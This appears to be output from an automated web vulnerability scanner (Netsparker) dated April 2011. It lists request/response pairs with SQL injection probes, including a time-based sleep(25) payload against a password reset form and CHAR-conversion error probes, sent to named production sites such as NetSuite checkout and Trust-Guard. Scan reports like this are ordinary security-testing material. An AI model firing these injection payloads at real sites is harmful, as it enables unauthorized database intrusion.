GET /core/media/media.nl?id=(select+convert(int,CHAR(95) Referer: https://checkout.netsuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=fspzN1GhT Accept-Encoding: gzip, deflate |
HTTP/1.1 206 Partial Content Date: Mon, 25 Apr 2011 14:28:11 GMT Server: Apache Cache-Control: No-Cache Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -1700483469:61636374 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 1983 <html><head><title>Notice <meta http-equiv='Content-Type' content='text/html; charset=UTF-8'> <link rel='stylesheet' href='/core/styles ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://checkout.netsuite |
Path: | /core/styles/pagestyles |
GET /core/styles/pagestyles Referer: https://checkout.netsuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=pbWBN1GZp Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:27:09 GMT Server: Apache Expires: Tue, 26 Apr 2011 06:15:09 GMT Last-Modified: Mon, 25 Apr 2011 14:27:09 GMT NS_RTIMER_COMPOSITE: 777140821:616363742D X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/css; charset=UTF-8 Content-Length: 69389 .iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles .iArrowLeft { ma ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://checkout.netsuite |
Path: | /pages/portal/page_not |
GET /pages/portal/page_not Referer: https://checkout.netsuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=dr9LN1Gcs Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:27:02 GMT Server: Apache NS_RTIMER_COMPOSITE: 791381320:616363742D Set-Cookie: JSESSIONID=2p9QN1GJ2 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 11320 <html><head><title <meta name="robots" content="noindex,nofollow <link rel="STYLESHEET" type="text/css" href="/pages/portal/css </head> <body bgcolor ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://checkout.netsuite |
Path: | /s.nl |
GET /s.nl?c=(select+convert(int,CHAR(95) User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=dr9LN1Gcs Accept-Encoding: gzip, deflate |
HTTP/1.1 302 Moved Temporarily Date: Mon, 25 Apr 2011 14:27:02 GMT Server: Apache Location: https://checkout.netsuite P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=UTF-8 Content-Length: 339 <html><head><title>302 Moved Temporarily</title></head <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://checkout ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://employer.unicru |
Path: | /asp/home/login.asp |
POST /asp/home/login.asp HTTP/1.1 Referer: https://employer.unicru User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: employer.unicru.com Cookie: ASPSESSIONIDSSRCBTSB Expect: 100-continue Accept-Encoding: gzip, deflate Content-Length: 201 image1=(select+convert(int,CHAR(95) |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 13:40:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET webservername: 44 Content-Length: 3924 Content-Type: text/html Set-Cookie: Emp=datpwx=&UN=fzv6u Cache-control: private <html> <head> <title>Unicru: Employer's Desktop Log In</title> <style type="text/css"> <!-- .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san- ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/ |
GET /hmc/report/?register=(select+convert(int,CHAR(95) Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e30aecfc Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:41:39 GMT Server: Apache/2.0.46 (Red Hat) Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:41:39 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://hourly.deploy.com |
Path: | /hmc/report/index.cfm |
GET /hmc/report/index.cfm Referer: https://hourly.deploy.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hourly.deploy.com Cookie: JSESSIONID=3e30aecfc Accept-Encoding: gzip, deflate Connection: Keep-Alive |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 13:41:39 GMT Server: Apache/2.0.46 (Red Hat) Content-Language: en-US Vary: Accept-Encoding,User Cache-Control: max-age=0 Expires: Mon, 25 Apr 2011 13:41:39 GMT Connection: close Content-Type: text/html; charset=UTF-8 ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://learn.shavlik.com |
Path: | /shavlik/index.cfm |
GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: learn.shavlik.com Cookie: CFID=799689; CFTOKEN=67476078 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 25 Apr 2011 12:26:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8 ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=sjhj47er21 Expect: 100-continue Accept-Encoding: gzip, deflate Content-Length: 119 btnCancel=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 |
HTTP/1.1 100 Continue HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 18:00:23 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://support.trust |
Path: | /index.php |
GET /index.php?_m=(select+convert(int,CHAR(95) Referer: https://support.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: support.trust-guard.com Cookie: SWIFT_sessionid40 Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 19:00:50 GMT Server: Apache/1.3.41 Ben-SSL/1.59 X-Powered-By: PHP/5.2.17 Content-Type: text/html Content-Length: 126 <br /> <b>Fatal error</b>: in <b>/homepages/9 |
Severity: | Medium |
Confidence: | Tentative |
Host: | https://support.trust |
Path: | /visitor/index.php |
GET /visitor/index.php?_m=-1 Referer: https://support.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: support.trust-guard.com Cookie: SWIFT_sessionid40 Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 19:07:38 GMT Server: Apache/1.3.41 Ben-SSL/1.59 X-Powered-By: PHP/5.2.17 Content-Type: text/html Content-Length: 126 <br /> <b>Fatal error</b>: in <b>/homepages/9 |
Severity: | Medium |
Confidence: | Firm |
Host: | https://checkout.netsuite |
Path: | /Netsparker00c59262f |
GET /Netsparker00c59262f User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=dr9LN1Gcs Accept-Encoding: gzip, deflate |
HTTP/1.1 206 Partial Content Date: Mon, 25 Apr 2011 15:09:26 GMT Server: Apache Cache-Control: No-Cache Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -2144347290:61636374 Set-Cookie: JSESSIONID=L0xGN1TCc X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 2024 <html><head><title>Notice <meta http-equiv='Content-Type' content='text/html; charset=UTF-8'> <link rel='stylesheet' href='/core/styles ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://checkout.netsuite |
Path: | /Netsparker3f4e2bee9 |
GET /Netsparker3f4e2bee9 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=dr9LN1Gcs Accept-Encoding: gzip, deflate |
HTTP/1.1 206 Partial Content Date: Mon, 25 Apr 2011 15:07:48 GMT Server: Apache Cache-Control: No-Cache Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 2000683563:616363742 Set-Cookie: JSESSIONID=2RW7N1TCB X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 2024 <html><head><title>Notice <meta http-equiv='Content-Type' content='text/html; charset=UTF-8'> <link rel='stylesheet' href='/core/styles ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://checkout.netsuite |
Path: | /Netsparkerd83f087f7 |
GET /Netsparkerd83f087f7 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=dr9LN1Gcs Accept-Encoding: gzip, deflate |
HTTP/1.1 206 Partial Content Date: Mon, 25 Apr 2011 15:10:47 GMT Server: Apache Cache-Control: No-Cache Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -110553779:616363742 Set-Cookie: JSESSIONID=6gtrN1TV8 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 2024 <html><head><title>Notice <meta http-equiv='Content-Type' content='text/html; charset=UTF-8'> <link rel='stylesheet' href='/core/styles ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://checkout.netsuite |
Path: | /core/ |
GET /core/?nsextt=%00%27%22-- Referer: https://checkout.netsuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=31PwN1GWQ Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:27:05 GMT Server: Apache Cache-Control: No-Cache Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: 333241087:616363742D Set-Cookie: JSESSIONID=hWd4N1GZG Set-Cookie: NLShopperId=rcHW8495 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 2650 <html> <head> <title>Checkout</title> <link rel='stylesheet' href='/core/styles ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://checkout.netsuite |
Path: | /core/media/Netspark |
GET /core/media/Netspark User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=dr9LN1Gcs Accept-Encoding: gzip, deflate |
HTTP/1.1 206 Partial Content Date: Mon, 25 Apr 2011 15:08:12 GMT Server: Apache Cache-Control: No-Cache Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -368749109:616363742 Set-Cookie: JSESSIONID=9pncN1TcC X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 2024 <html><head><title>Notice <meta http-equiv='Content-Type' content='text/html; charset=UTF-8'> <link rel='stylesheet' href='/core/styles ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://checkout.netsuite |
Path: | /core/media/Netspark |
GET /core/media/Netspark User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: checkout.netsuite.com Cookie: JSESSIONID=dr9LN1Gcs Accept-Encoding: gzip, deflate |
HTTP/1.1 206 Partial Content Date: Mon, 25 Apr 2011 15:07:31 GMT Server: Apache Cache-Control: No-Cache Pragma: No-Cache Expires: 0 NS_RTIMER_COMPOSITE: -812652053:616363742 Set-Cookie: JSESSIONID=JwDGN1TRX X-Powered-By: Servlet/2.5 JSP/2.1 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Content-Type: text/html; charset=utf-8 Content-Length: 2024 <html><head><title>Notice <meta http-equiv='Content-Type' content='te |